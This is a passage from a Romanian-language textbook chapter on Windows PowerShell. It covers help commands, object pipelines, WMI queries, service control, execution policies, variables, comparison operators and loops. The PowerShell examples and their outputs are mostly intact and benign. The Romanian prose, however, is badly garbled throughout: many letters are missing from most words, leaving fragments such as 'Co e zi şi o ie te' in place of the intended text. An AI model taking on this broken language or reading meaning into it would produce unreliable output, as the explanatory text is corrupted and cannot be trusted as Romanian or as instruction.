i el de detaliu puţi ai teh i , se foloseşte pa a et ul Full:
Get-Help Get-Process –Full
Este posi ilă afişa ea doa a u ei atego ii de i fo aţii di pagi a de ajuto . Î e e plul
u ăto , se afişează doa e e plele de utilizare ale comenzii Get-Process:
Get-Help Get-Process –Examples
De ase e ea, pe t u afişa ea tutu o pa a et ilo u ei o e zi, se foloseşte pa a et ul

Parameter urmat de *. I tuiti , pe t u afişa ea i fo aţiilo desp e u si gu pa a et u,
acesta se spe ifi ă e pli it:
Get-Help Get-Process –Parameter *
Get-Help Get-Process –Parameter id
17 | C u p r i n s
Pe t u a ea o o siste ţă faţă de o e zile UNIX, o a da Get-Help poate fi î lo uită

de comenzile:
man <nume_comanda>
sau
info <nume_comanda>
e ep ezi tă fu ţii i terne ale PowerShell-ului a e apelează Get-Help şi pot fi p i ite a

pe işte alias-uri.
Caracterul * poate fi folosit în cadrul comenzii Get-Help pe t u a afişa ezultatele ai
ulto o e zi. “p e e e plu, u ătoa ea o a dă afişează toate se ţiu ile de ajutor ce
încep cu „about , î p eu ă u o s u tă des ie e a lo :
Get-Help about*
Pe t u ai ulte detalii legate de odul î a e pot fi su stituite şi u ile de a a te e î

PowerShell şi î Wi do s, î ge e al , se poate o ţi e ajuto di e t di i te iorul PowerShell-
ului i t odu â d o a da totodată u e e plu pe t u o a da a te ioa ă :
Get-Help about_Wildcards
Wildcard-ul poate fi folosit şi î ad ul pa a et ilo . Î e e plul u ăto se listează doa

p o esele a e î ep u „ di lista etu ată de Get-Process:
PS C:\Users\Administrator> Get-Process w*
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
492 17 56868 9584 184 10.51 9308 winamp
108 5 1580 2320 51 1.54 556 wininit
152 4 2604 4176 53 1.70 604 winlogon
638 34 49580 26888 342 785.89 10848 WINWORD
150 5 2120 3164 48 10.58 1416 wlanext
320 10 24192 5000 155 78.92 3508 WLTRAY
40 2 680 996 21 0.02 1408 WLTRYSVC
0.3.2.7 Co e zi şi o ie te
Co e zile şi ezultatele di PowerShell sunt, de fapt, obiecte .NET. Conform conceptelor
de ază ale p og a ă ii o ie tate pe o ie te, u o ie t ep ezi tă o i sta ţă, o e titate e
deţi e a u ite a a te isti i des ise de p op ietăţi şi poate e e uta a u ite a ţiu i p i
intermediul metodelor.
“p e e e plu, o o a da e etu ează u se i iu in PowerShell de fapt etu ează u
o ie t e ep ezi tă se i iul. I fo aţiile desp e se i iu su t p op ietăţi ale o ie tului
etu at. Po i ea u ui se i iu se t adu e î seta ea p op ietăţii „Status pe aloa ea
„started folosi d o etodă a o iectului serviciu.
Di faptul ă fu da e tul o e zilo PowerShell îl ep ezi tă o ie tele, se dedu e faptul
ă a u ite utilita e de p o esa e azate pe te t şi apli ate pe ezultatele o e zilo
PowerShell a putea să u ai ă ezultatul aşteptat. De fapt, în cele mai multe dintre cazuri,
folosi ea utilita elo de p o esa e te t i i u este e esa ă, di o e t e datele spe ifi e
pot fi extrase din rezultatele comenzilor folosind metodele standard de manipulare a
obiectelor. Acest lucru este posibil deoarece ezultatele o e zilo î apsulează o ulţi e de
alte i fo aţii de ât ele izi ile a şi u i de a a te e pe e a .
“p e e e plu, o odalitate de a afişa i fo aţii desp e toate i te feţele de eţea di
siste , fizi e sau i tuale, o ep ezi tă u ătoa ea o a dă:
get-wmiobject Win32_NetworkAdapterConfiguration
Fă ă a i se apli a eu filt u, o a da de ai sus afişează su fo a u ei liste âţi a

pa a et i ai i te feţelo , a p eze ţa u ei ad ese IP, a u ui se e DN“, da ă i te faţa este
18 | ‘ e ţ e l e L o a l e
o figu ată auto at p i DHCP sau u, u ele său, et , o ate â d a este i fo aţii pe t u
toate i te feţele. La i el de te t, da ă s-a do i doa afişa ea u elui i te feţei şi a ad esei IP
configurate pe ea, s-a folosi a eeaşi o a dă, filt â d ezultatul său şi păst â d a elaşi od
de afişa e. Î PowerShell, î să, ezultatul este u o ie t di a e se pot e t age doa
p op ietăţile do ite, a î e e plul u ăto :
get-wmiobject Win32_NetworkAdapterConfiguration | Select-Object -property IPAddress,
Description
Coma da de ai sus sele tează doa p op ietăţile de u ite IPAddress şi Description

pe t u fie a e i te faţă şi le afişează su fo a u ui ta el.
O i po ta tă o a dă pe t u afişa ea tutu o p op ietăţilo şi etodelo u ui o ie t o
ep ezi tă Get-Member. Spre exemplu, pentru obiectul returnat de comanda de mai sus,
p op ietăţile şi etodele sale pot fi afişate t i iţâ du-l printr-un pipe comenzii Get-Member:
PS C:\Users\Administrator> get-wmiobject Win32_NetworkAdapterConfiguration | get-member
TypeName:
System.Management.ManagementObject#root\cimv2\Win32_NetworkAdapterConfiguration
Name MemberType Definition
---- ---------- ----------
DisableIPSec Method System.Management...
EnableDHCP Method System.Management...
EnableIPSec Method System.Management...
EnableStatic Method System.Management...
ReleaseDHCPLease Method System.Management...
DefaultTOS Property System.Byte DefaultTOS {get;set;}
DefaultTTL Property System.Byte DefaultTTL {get;set;}
Description Property System.String Description {get;set;}
DHCPEnabled Property System.Boolean DHCPEnabled {get;set;}
DHCPLeaseExpires Property System.String DHCPLeaseExpires {get;set;}
DHCPLeaseObtained Property System.String DHCPLeaseObtained {get;set;}
DHCPServer Property System.String DHCPServer {get;set;}
DNSDomain Property System.String DNSDomain {get;set;}
[...]
0.3.2.8 Î lă țuirea o e zilor pipes)

PowerShell pe ite î lă ţui ea ai ulto o e zi p i folosi ea ope ato ului pipe (|) cu
a elaşi efe t a şi î UNIX: edi e ta ea ieşi ii u ei o e zi sp e i t a ea alteia. Dato ită
odului î a e a u ite o e zi a eptă date sau di o side e te ale fo atului do it la
ieşi e, deseo i su t e esa e p elu a i la i el de şi u i de a a te e î t e două o e zi ce
p elu ează date sau î ai te de afişa ea ezultatului fi al.
Î od p a ti , ieşi ile şi i t ă ile o e zilo su t t atate a o ie te, astfel ă o o a dă
e p i eşte a i t a e ezultatul alteia poate a ţio a di e t asup a p op ietăţilo şi etodelor
sale fă ă o e sii supli e ta e. De ase e ea, utilizato ul poate ad esa p op ietăţi şi etode
di e t după u e, efii d e esa ă filt a ea ezultatului pe t u sele ta ea datelo do ite, a î
cazul UNIX-ului şi a utilita elo sed, awk, grep, cut, şa d.
Î e e plul u ăto , ezultatul u ei o e zi ipconfig este trimis comenzii findstr care
p i eşte a pa a et u şi ul de a a te e de ăutat. ‘ezultatul este ide ti u al utilita ului
grep di UNIX, folosit î o diţii si ila e:
PS C:\Users\Administrator> ipconfig | findstr "Address"
Link-local IPv6 Address . . . . . : fe80::a928:ea78:f920:ac15%10
IPv4 Address. . . . . . . . . . . : 141.85.37.193
Link-local IPv6 Address . . . . . : fe80::9dd5:cc72:ab31:8927%12
IPv4 Address. . . . . . . . . . . : 192.168.13.1
Link-local IPv6 Address . . . . . : fe80::525:fc37:994d:636f%14
IPv4 Address. . . . . . . . . . . : 192.168.216.1
IPv6 Address. . . . . . . . . . . : 2002:8d55:25c1::8d55:25c1
0-5: Folosirea operatorului "|" pentru filtrarea rezultatului unei comenzi

19 | C u p r i n s
0.3.2.9 Folosirea parametrilor

Parametrii in PowerShell sunt ide tifi aţi p i a a te ul „- . Caracterele („/ sau „\ e
marcau parametrii în cmd.exe nu mai sunt folosite. La tastarea unui parametru se poate
i t odu e u ele o plet, da este a eptat şi da ă se i t odu e u u ă sufi ie t de
a a te e pe t u a disti ge pa a et ul de altele u u e ase ă ătoa e. Î e e plul u ăto ,
ele două o e zi su t ide ti e, şi ul „det fii d sufi ie t pe tru a-l distinge de parametrul
Debug:
Get-Help Get-Date –Detailed
Get-Help Get-Date –det
Î u ele azu i, i t odu e ea u elo pa a et ilo este opţio ală, fii d sufi ie tă
i t odu e ea alo ii lo . “p e e e plul, fo a o pletă a o e zii Get-Help presupune
declararea numelui comenzii precedat de parametrul Name, a î e e plul de ai jos. Totuşi,
pa a et ii pot fi folosiţi fă ă a li se spe ifi a u ele da ă se espe tă u st i teţe o di ea lo
di se ţiu ea de si ta ă a pagi ii de ajuto :
Get-Help –Name Get-Host
0.3.2.10 I tera țiu ea u Windows PowerShell

În general, comenzile PowerShell nu sunt case-sensitive. Totuşi, pe t u situaţiile î a e se
spe ifi ă alo i lite ale, a î azul î a e se dă a pa a et u u şi de a a te e de ăutat,
apitaliza ea o e tă poate a ea i po ta ţă.
Pe t u a fa ilita i te a ţiu ea, PowerShell ofe ă opţiu ea de o pleta e auto ată
o te tuală. A easta poate fi folosită p i apăsa ea tastei Tab atât pentru numele comenzilor
ât şi pe t u pa a et ii lo , di o e tul î a e s-a int odus el puţi u a a te di
te e ul de o pletat. Co pleta ea auto ată ealizează auto at apitaliza ea o e tă a
comenzilor.
Odată e PowerShell a fost la sat, poate fi folosit î a eeaşi a ie ă a şi i te p eto ul
cmd.exe. De exemplu, comanda dir listează o ţi utul u ui di e to , cd s hi ă di e to ul
u e t şi pot fi folosite o e zi p e u copy, move, del, şa d. Aşa u s-a ai e ţio at şi
î se ţiu ea 0.3.2.6: Comenzi de ajutor în PowerShell, listarea comenzilor încorporate în
PowerShell se poate face prin comanda Get-Command. Totuşi, PowerShell a eptă o se ie ult
e ti să de o e zi p i faptul ă i ple e tează o ultitudi e de alias-uri de comenzi care
î lo uies u a sau ai ulte o e zi î lă ţuite, di o side e te de uza ilitate, efi ie ţă î
o pu e ea o e zilo sau pe t u a păst a si ila ităţi u DO“ şi UNIX. Lista o pletă a
a esto o e zi poate fi o ţi ută p i o a da help sau, indirect, prin comanda Get-Help *
care are drept efect listarea tutu o fişie elo de ajuto pe t u o e zile o espu zătoa e1.
A easta asigu ă, i tuiti , faptul ă toate o e zile, atât î o po ate ât şi aliasurile sunt
documentate.
Câteva dintre comenzile UNIX ce sunt implementate în PowerShell ca aliasuri includ: diff,
ps, ls, pwd, cat, etc.
Spre exemplu, aliasul ps a e a elaşi efe t a şi o a da Get-Process, ca în exemplul
u ăto :
PS C:\> ps
------- ------ ----- ----- ----- ------ -- -----------
243 12 247672 257788 368 435.57 7344 AcroRd32
127 14 1796 2004 39 0.22 2544 alg
1
U fapt i te esa t de e a at este ă la utiliza ea o e zii help, ezultatul este afişat î stilul
utilitarului more, di UNIX: tasta E te pe t u li ia u ătoa e sau “pa e pe t u e a ul u ăto .
20 | ‘ e ţ e l e L o a l e
65 3 2172 796 38 0.12 2008 AppleMobileDeviceService

109 3 1216 968 36 0.14 988 Ati2evxx
133 4 1956 3460 51 79.33 1952 Ati2evxx
154 6 24324 16160 71 1572 audiodg
47 2 1120 472 49 0.11 3452 brs
187 10 8288 7732 102 33.62 1828 BTStackServer
[...]
PS C:\> Get-Proces
------- ------ ----- ----- ----- ------ -- -----------
243 12 247672 257788 368 435.57 7344 AcroRd32
127 14 1796 2004 39 0.22 2544 alg
65 3 2172 796 38 0.12 2008 AppleMobileDeviceService
109 3 1216 968 36 0.14 988 Ati2evxx
133 4 1956 3460 51 79.33 1952 Ati2evxx
154 6 24324 16160 71 1572 audiodg
47 2 1120 472 49 0.11 3452 brs
187 10 8288 7732 102 33.62 1828 BTStackServer
[...]
0-6: ps (alias şi Get-Process o a dă
Pe t u a de o st a ă ezultatul aliasului este, de asemenea, de tip obiect, folosind

i fo aţiile di a esta, se pot o do a p o esele după u ă şi e po ta lista î t -u fişie î
format HTML1:
PS C:\> ps | Sort-Object id | ConvertTo-Html > procese.html
PS C:\> ls procese.html
Directory: Microsoft.PowerShell.Core\FileSystem::C:\
Mode LastWriteTime Length Name

---- ------------- ------ ----
-a--- 8/1/2008 4:04 PM 198444 procese.html
PowerShell ofe ă o e zi şi pe t u i te a ţiu ea u WMI Windows Management

Instrumentation . Co a da de ază folosită pe t u a o ţi e o ie te p i WMI este Get-
WmiObject, cu alias-ul „gwmi . “p e e e plu, o ţi e ea de i fo aţii desp e BIO“-ul
sistemului se poate face facil prin comenzile Get-WmiObject -Class Win32_BIOS sau Get-
WmiObject -Class Win32_ComputerSystem.
PS C:\> Get-WmiObject -Class Win32_BIOS
SMBIOSBIOSVersion : A14
Manufacturer : Dell Inc.
Name : Phoenix ROM BIOS PLUS Version 1.10 A14
SerialNumber : 3YN0W2J
Version : DELL - 27d70402
PS C:\> Get-WmiObject -Class Win32_ComputerSystem
Domain : WORKGROUP
Manufacturer : Dell Inc.
Model : MM061
Name : WIN-8J4PG74KHA9
PrimaryOwnerName : Windows User
TotalPhysicalMemory : 2145083392
De ase e ea, WMI poate fi folosit şi pe t u i te a ţiu ea u p o ese sau se i ii. Lista ea
lor se face prin comenzile: Get-WmiObject win32_process, respectiv Get-WmiObject
win_32_service. Ate ţie, a este o e zi au ezultate e t e de olu i oase, di o e t
e afişează toate i fo aţiile e pot fi e t ase di o ie tele de tip p o es, espe ti se i iu. O
soluţie pe t u edu e ea a tităţii de i fo aţii afişate o ep ezi tă fie apli a ea u ui filtru, fie
1
“e o se ă apoi, la izualiza ea pagi ii HTML o ţi ute, ă î a easta au fost i luse su fo a apetelo
de tabel toate datele despre procese ce sunt returnate de comanda ps / Get-Process, mai exact, 62 de
pa a et ii spe ifi i fie ă ui p o es, î o pa aţie u ei a e su t afişaţi i pli it î o solă, eea e o fi ă
î ă o dată atu a de o ie t a ezultatelo o e zilo PowerShell.
21 | C u p r i n s
spe ifi a ea doa a a u ito â pu i e o fi afşate, î p eu ă u alo ile lo . Î u ăto ul

e e plu su t i te ogate doa a u ite p op ietăţi ale o ie tului e î apsulează i fo aţii
desp e siste ul de ope a e u e t, o ţi ut p i WMI:
PS C:\> Get-WMIObject -class Win32_OperatingSystem -property csname, Caption, Version,
TotalVirtualMemorySize, FreeVirtualMemory
__GENUS : 2
__CLASS : Win32_OperatingSystem
[...]
__RELPATH : Win32_OperatingSystem=@
[...]
Caption : Microsoft® Windows Server® 2008 Standard
CSName : WIN-8J4PG74KHA9
FreeVirtualMemory : 2602080
TotalVirtualMemorySize : 4471252
Version : 6.0.6001
0-7: “ele tarea e pli ită a a u itor â puri ale u ui o ie t retur at
Î od e ide t, i te a ţiu ea u p o ese şi se i ii p i PowerShell şi WMI u se

edu e doa la afişa ea de i fo aţii. Î e e plul u ăto se de o st ează odul î a e u
serviciu poate fi po it, î p eu ă u e ifi a ea stă ii a estuia î ai te şi după po i e:
1. “e aută u se i iu u u ele ase ă ăto u „ipod :
PS C:\> Get-Service ipod*
Status Name DisplayName
------ ---- -----------
Running iPod Service iPod Service
2. După ide tifi a ea sa, i se i te oghează sta ea u e tă:

PS C:\> Get-WmiObject win32_service -filter "name='ipod service'"
ExitCode : 1077
Name : iPod Service
ProcessId : 0
StartMode : Manual
State : Stopped
Status : OK
3. “e o se ă ă se i iul este op it. “e foloseşte etoda StartService() din obiectul de tip

serviciu returnat prin WMI pentru a-l porni:
PS C:\> (Get-WmiObject win32_service -filter "name='ipod service'").StartService()
__GENUS : 2
__CLASS : __PARAMETERS
__SUPERCLASS :
__DYNASTY : __PARAMETERS
__RELPATH :
__PROPERTY_COUNT : 1
__DERIVATION : {}
__SERVER :
__NAMESPACE :
__PATH :
ReturnValue :
4. “e e ifi ă di ou sta ea se i iului şi se o se ă ă a esta ulează fă ă p o le e:

PS C:\> Get-WmiObject win32_service -filter "name='ipod service'"
ExitCode : 0
Name : iPod Service
ProcessId : 904
StartMode : Manual
State : Running
Status : OK
U ăto ul e e plu se î ad ează într-o atego ie de utiliza e ai „e oti ă a o e zilo

e se foloses de WMI pe t u a o ţi e i fo aţii. Folosi d pa a et ul query, se poate
22 | ‘ e ţ e l e L o a l e
spe ifi a su sa di a e se e t ag datele, â pu ile de i te es p e u şi e filt e se o apli a

acestora, într-un printr-o si ta ă “QL:
PS C:\> get-wmiobject -query "select * from win32_service where name='dhcp'"
ExitCode : 0
Name : Dhcp
ProcessId : 1008
StartMode : Auto
State : Running
Status : OK
0-8: O ți erea stării u ui ser i iu folosi d PowerShell şi WMI, pri tr-o o a dă “QL
E istă, i eî ţeles, o ultitudi e de alte odu i î a e PowerShell poate fi folosit,

s u tătu i şi e epţii î utiliza e, da detalie ea a esto a a putea ea su ie tul u ei ă ţi de
si e stătătoa e, aşada a estea o fi e luse di t e su ie tele t atate î pagi ile de faţă.
Totuşi, pe t u a putea apli a PowerShell în utilizarea diverselor servicii ce vor fi detaliate în
apitolele u ătoa e, e e esa ă ap ofu da ea la u nivel mediu a tehnicilor de scripting în
PowerShell.
0.3.2.11 Scripting în PowerShell

Î od o al, e de aşteptat a o i e i te p eto de o e zi să supo te, ati sau u,
posibilitatea de a rula scripturi. Posibilitatea de scripting a e istat şi î t e ut, p i intermediul
lui cmd.exe, da apa ilităţile lui PowerShell se idi ă ult deasup a a esto a. Totodată, p i
scripting se o se ă ult ai la i te depe de ţa di t e PowerShell şi platfo a .NET,
folosindu-se o e ţii de de u i e şi o si ta ă ult ase ă ătoarelor limbajelor bazate pe
.NET, precum C#.
0.3.2.11.1 Concepte de securitate în scripting

Posi ilitatea de a auto atiza şi d eptu ile pe a e le au î ge e al s iptu ile de a
i te a ţio a u siste ul au eat di totdeau a u e oase difi ultăţi şi au dat aşte e unui
ediu p opi e pe t u apa iţia i uşilo , ie ilo şi a apli aţiilo spyware. Câteva considerente
de securitate au fost implementate implicit în PowerShell to ai pe t u a ad esa li ită ile
impuse de aceste riscuri:
 Scripturile PowerShell nu sunt inere t e e uta ile. Î Wi do s, a easta î sea ă ă u e istă
o aso ie e i pli ită î t e PowerShell şi s iptu ile sale a e au e te sia .ps1. Un dublu-clic pe
a est tip de fişie u a auza e e uţia sa, i a fi des his u Notepad pentru a i se vizualiza
conţi utul.
 “i gu ele s iptu i a eptate sp e a fi ulate su t ele se ate şi auto izate p i ole ţia de
certificate a sistemului.
 Pe t u s iptu ile asup a ă o a e istă d eptul de e e uţie, a easta poate fi i iţiată doa da ă
se spe ifi ă î t eaga ale a scriptului, pentru a evita instalarea de scripturi cu nume de comenzi
uzuale în anumite directoare (un echivalent al rootkit1-urilor de pe Linux).
E ide t, a este ăsu i u su t sufi ie te da ofe ă u g ad spo it de e ita e a p o edu ilo

ce ar putea cauza dau e siste ului. D eptu ile a e sta iles egulile după a e s iptu ile su t
sau u e e utate su t di tate de politi a de e e uţie a ti ă î siste . Pe t u a edea a e este
a easta, se foloseşte o a da u ătoa e:
PS C:\> Get-ExecutionPolicy
Restricted
1
http://e . ikipedia.o g/ iki/‘ootkit şi http:// . ootkit. o
23 | C u p r i n s
Î e e plul de ai sus, politi a a ti ă este ea de Restricted, a e este şi ea i pli ită. Valo ile
posi ile pe a e politi a de e e uţie a siste ului le poate a ea su t:
 Restricted: i pli it, u a eptă e e uţia i iu ui s ipt
 AllSigned: sunt acceptate sp e e e uţie doa s iptu ile se ate
 RemoteSigned: este pe isă e e uţia s iptu ilo lo ale; estul t e uie se ate
 Unrestricted: toate scripturile pot fi executate
Politi a i i ă e esa ă pe t u a putea ula lo al s iptu i ese ate este

RemoteSigned. Modifi a ea politi ii u e te de e e uţie î RemoteSigned se face cu
u ătoa ea o a dă:
Restricted
PS C:\> Set-ExecutionPolicy RemoteSigned
RemoteSigned
0.3.2.11.2 Exemplu: crearea primului script în PowerShell

Pentru a crea un script PowerShell, se eează u fişie te t u Notepad sau orice editor de
te t şi i se setează e te sia ps1. Setarea unei alte extensii va avea ca efect, la rularea sa,
te tati a de a fi t atat de ăt e Wi do s u o apli aţie i pli ită e a eptă e te sia espe ti ă
şi u a fi e e utat de ăt e PowerShell.
1. “e eează u fişie te t u u ăto ul o ţi ut:
$a = "Hello"
$b = "World!"
write-host $a
echo $b
2. “e sal ează u e te sia ps1. Pe t u e e plu se a o side a ă se sal ează a C:\test.ps1.

3. În PowerShell, se i t odu e u ătoa ea o a dă şi se p i eşte ezultatul1:
PS C:\> PowerShell c:\test.ps1
Hello
World!
0.3.2.11.3 Variabile
Co eptul de a ia ilă se î tâl eşte î ap oape o i e li aj de p og a a e sau de
scripting. Î ese ţă, ep ezi tă o zo ă de e o ie ad esa ilă p i t -un nume dat de
p og a ato a e poate să sto heze date e o fi folosite la u o e t ulte io . Î
PowerShell pot fi defi ite a ia ile, da u ele a esto a t e uie să î eapa u se ul dola
($). Numele variabilelo pot o ţi e a a te e alfa u e i e lite e şi if e şi alte âte a
si olu i. “e pot i t odu e hia şi spaţii î u ele a ia ilelo , u o diţia a u ele să fie
cuprinse între paranteze acolade {}.
U ătoa ele e e ple ep ezi tă i itializă i alide de variabile:
$name = "Nicoleta"
$pi = 3.14
${variabila cu spatii} = "atentie la paranteze!"
At i ui ea a ia ilelo u o aloa e se putea fa e şi î t e ut, p i i te ediul lui cmd.exe

şi al o e zii SET, u dife e ţa ă a esta di u ă u supo ta de u irea variabilelor folosind
spaţii.
După u se o se ă, u s-a spe ifi at i ăie i tipul datelo e su t sto ate î a ia ile.
Acest lucru poate crea uneori probleme în scripturi complexe, de aceea PowerShell ofe ă şi
posibilitatea de a defini variabile cu tip. Cu alte cuvinte, PowerShell poate fi informat despre
1
echo este un alias pentru comanda Write-Output.
24 | ‘ e ţ e l e L o a l e
tipul datelo e o fi eţi ute î a ia ila espe ti ă, eea e ep ezi tă şi o p a ti ă

e o a dată. Fie, sp e e e plu, odul u ăto :
$a = 5
write-host $a + 3
Î se e ţa a te ioa ă s-a atribuit valoarea 5 variabilei $a, după a e s-a afişat î o solă
rezultatul expresiei $a + 3. După u e de aşteptat, se a afişa .
Da da ă se ia î o side a e e e plul u ăto :
$a = 7
$s = "un sir de caractere"
…cod nesemnificativ…
$a = "Nicoleta"
…în continuare, cod nesemnificativ…
write-host ($a + 7)
Codul de ai sus defi eşte a ia ila $a u aloa ea şi a ia ila $s u şi ul de a a te e

„Ni oleta . P esupu â d ă at i ui ea s-a fă ut î od e o at î t e a ia ila $a şi şi ul
„Ni oleta , ezultatul afişat î u a e p esiei de pe ulti a li ie a o sta î o ate a ea
elo două ele e te a şi u i de a a te e, ezultâ d „Ni oleta . A eastă p o le ă poate fi
uşo e itată p i sta ili ea tipu ilo de date sto ate î fie a e a ia ilă, î piedi â d ope aţia
de at i ui e di t e o a ia ilă defi ită a î t eg integer şi u şi de a a te e string), ca în
e e plul u ăto , es is:
[int]$a = 7
[string]$s = "un sir de caractere"
…cod nesemnificativ…
$a = "Nicoleta"
…în continuare, cod nesemnificativ…
write-host ($a + 7)
Stabilirea tipurilor variabilelor se face prefixându-le numele cu un identificator ce descrie

un tip de date, în exemplul de mai sus, [int] şi [string]. Rularea exemplului de mai sus va
auza o e oa e, e a a u ţa faptul ă e ul d ept al atribuirii $a = “Nicoleta” nu se
află î fo atul o espu zăto .
Cele mai comune tipuri de variabile utilizabile în PowerShell su t u ătoa ele1:
 [boolean] Ade ă at sau fals.
 [int] Nu e e î t egi pe de iţi.
 [char] Un singur caracter.
 [string] Şi de a actere.
 [single] Nu ă ze i al, si plă p e izie.
 [double] Nu ă ze i al, du lă p e izie.
 [datetime] Data, ora.
 2
[adsi] Obiect de tip Active Directory Service Interface (ASDI)
 [wmi] I sta ţă sau ole ţie WMI
 [wmiclass] Clasă WMI
Vectorii în PowerShell se defi es e t e de uşo , a î e e plul de od u ăto :

$PS C:\> $vec = 4,8,15,16
PS C:\> Write-Host $vec
4 8 15 16
Pe t u efe i ea la ele e tele u ui e to , se foloseşte ad esa ea i de ată, ţi â d o t ă

i de şii ele e telo di t -un vector încep de la 0 (zero), ca în majoritatea limbajelor de
p og a a e şi s ipti g: $vec[4], $vec[0], etc.
1
E istă şi a ia ila p edefi ită $NULL. O i e a ia ilă ei iţializată eutilizată a e o ţi utul egal u
$NULL.
2
Mai multe despre ASDI: http://msdn.microsoft.com/en-us/library/aa772170.aspx
25 | C u p r i n s
Adăuga ea de oi ele e te î t -un vector se face tot p i i te ediul ope ato ului „+ 1:
PS C:\> $vec = $vec + 23, 48
PS C:\> Write-Host $vec
4 8 15 16 23 48
0.3.2.11.4 Expresii o diţio ale

Ca în orice limbaj de programare sau de scripting, fle i ilitatea sa stă î posi ilitatea de a
de ide a u ile e o fi e e utate î fu ţie de alo ilo a u ito a ia ile. Î fo d, o diţia
este eea e stă la aza s iptu ilo şi le dife e ţiază de o si plă î lă ţui e i alte a ilă de
o e zi a e se e e ută î totdeau a î a eeaşi o di e.
E e plul u ăto a t e ui să poată fi deja u ă it fă ă p ea ulte e pli aţii
suplimentare:
$a = 2
if ($a -eq 1)
{
write-host "unu"
}
elseif ($a -eq 2)
{
write-host "doi"
}
else
{
write-host "diferit de unu sau doi"
}
F ag e tul de s ipt de ai sus e ifi ă aloa ea at i uită a ia ilei $a. Da ă a easta este
u ei a afişa „unu , da a este a afişa „doi şi pe t u o i e altă aloa ea i lusi
valori non- u e i e şi alte tipu i a afişa „diferit de unu sau doi 2.
După u se o se ă, si gu ul ele e t elati ou i t odus este ope ato ul de egalitate
folosit în interiorul if-ului: –eq. E istă o se ie de alţi ope ato i de o pa aţie e pot fi folosiţi î
PowerShell, fie a e di t e a eştia fii d des işi p i t -o ati ă - u ată de o a e ie e de
două lite e a fu ţiei u e i e pe a e a esta o î depli eşte p e u şi alte fo e pe t u
dife ite tipu i de date. Lista este u ătoa ea:
 -eq Egalitate
 -ne Inegalitate
 -lt Mai mic
 -le Mai mic sau egal
 -gt Mai mare
 -ge Mai mare sau egal
 -contains Dete i ă apa te e ţa la u g up, etu ează î totdeau a [boolean]True sau

[boolean]False
-notcontains Dete i ă eapa te e ţa la u g up, etu ează î totdeau a
[boolean]$True sau [boolean]$False
 -match Co siste ţă la o pa a ea p i e p esii egulate
 -notmatch I o siste ţă la o pa a ea p i e p esii egulate
 -like Co siste ţă la o pa a ea u wildcard-uri
 -notlike I o siste ţă la o pa a ea u ild a d-uri
 -band ŞI i a
 -bor SAU binar
 -bnot egaţie i a ă
 -is Este de tipul (ex: $x –is [int])
 -isnot Nu este de tipul (ex: $x –isnot [single])
1
În general, expresiile de tipul $x = $x + y pot fi înlocuite p i e p esia $ += , a şi î li ajul C.
2
Pa a teze a olade su t o ligato ii î toate situaţiile, hia da ă î ad ează o si gu ă i st u ţiu e.
26 | ‘ e ţ e l e L o a l e
În plus, PowerShell i ple e tează a ia tele case sensitive ale unor comenzi prezentate
mai sus (-clt, -cgt, -cle, -cge, -ceq, -cne, -clike, -cnotlike, -ccontains, -
cnotcontains, -cmatch, -cnotmatch , p e u şi o se ie de ope ato i spe iali, pe lâ gă ei
clasici, ca +, -, /, %, *, !:
 -replace Înlocuire (ex: “abcde” –replace “b”, “B”)
 -ireplace Înlocuire case-insensitive
 -as Convertire la alt tip (ex: 123 –as [string] t atează a şi de a a te e
 .. Operator de interval (ex: foreach ($i in 1..10) {$i} afişează u e ele de lala
10)
 & Operator de apel (ex: $a = “Get-ChildItem” &$a va executa Get-ChildItem)
 -F Operator de formatare (ex: foreach($p in Get-Process) {"{0,-15} has {1,6}
handles" –F $p.processname,$p.Handlecount} a e a efe t afişa ea liste de p o ese
în formatul <nume_proces> has <x> handles)
În PowerShell se poate folosi şi o o st u ţie de tipul switch-case, u o si ta ă ai si plă

decât în C:
$culoare = "rosu"
switch ($culoare)
{
rosu {write-host "culoarea rosie"; break}
verde {write-host "culoarea verde"; break}
albastru {write-host "culoarea albastra"; break}
galben {write-host "culoarea galbena"; break}
}
0.3.2.11.5 I stru ţiu i de i lare

În PowerShell e istă odu i î a e se pot defi i i lu ile epetiţiile : for, foreach,
while şi do..while.
Ciclul for a e e a t a eeaşi si ta ă a şi î li ajul C, sp e e e plu:
for(<iniţializări>;<condiţie>;<repetare>)
{
<instrucţiuni>
}
U ăto ul od afişează u e ele de la la :

for($i=1;$i -lt 101;$i++)
{
write-host $i
}
Ca şi î C, se ţiu ea de <iniţializări> se e e ută doa o dată, la p i a ite aţie,

se ţiu ea de <condiţie> este e ifi ată după fie a e ite aţie, ia se ţiu ea de <repetare>
este e e utată la fi alul fie ă ei ite aţii. “e o se ă posi ilitatea utiliză ii ope ato ului ++.
Spre deosebire de instructiunea for, i st u ţiu ea foreach este o epută astfel î ât
p i i d o ole ţie de o ie te, a e e uta o se ţiu e de od pe t u for) fiecare (each) dintre
ele e tele di ole ţie de u de şi u ele . “i ta a ge e ală este u ătoa ea:
foreach ($<element> in $<colecţie_de_elemente>)
{
<instrucţiuni>
}
U ăto ul e e plu foloseşte i st u ţiu ea foreach pe t u a afişa u ele tutu o

fişie elo di di e to ul C:\Windows\System32:
foreach ($file in Get-ChildItem C:\Windows\System32)
{
write-host $file
}
27 | C u p r i n s
Di ou si ila ă u C, si ta a u ei o st u ţii de tip While este u ătoa ea:

while(<condiţie>)
{
<instrucţiuni>
}
Sintaxa lui Do..While este, de ase e ea, si ila ă u C, u e epţia se ului pu t şi

i gulă de după While, care în PowerShell lipseşte1:
do
{
write-host $a
$a++
} while ($a -lt 10)
De ase e ea, î o st u ţiile de tip epetiţie pot fi folosite şi i st u ţiu ile break şi
continue, cu efectele binecunoscute.
0.3.2.12 Apli ații PowerShell

După e u e a ea u ei u e pă ţi a apa ilităţilo de scripting ale lui PowerShell, pot fi
analizate o serie de exemple de utilizare mai complexe, folosind structurile studiate mai sus.
Fie u ătoa ea se e ţă de s ipt:
Get-Service | ForEach {if ($_.Status -eq "Running") {write-host $_.DisplayName}}
“e e ţa de ai sus etu ează u ele î t eg u al e e uta ilului, i des ie ea al

tuturor se i iilo e ulează î siste .
O se ie de o st u ţii oi p eze tate ai i e esită e pli a e. Î p i ul â d, Get-Service
etu ează lista o ie telo se i iilo di siste . ‘ezultatul o ţi ut di a esta este t i is a
intrare prin operatorul pipe (|) ciclului foreach. Din moment ce Get-Service etu ează o
ole ţie de o ie te de tip se i iu, a est tip de ezultat este pe fe t pe t u se ite a p i
elementele sale folosind foreach. Folosi d i st u ţiu ea if se e ifi ă da ă sta ea fie ă ui
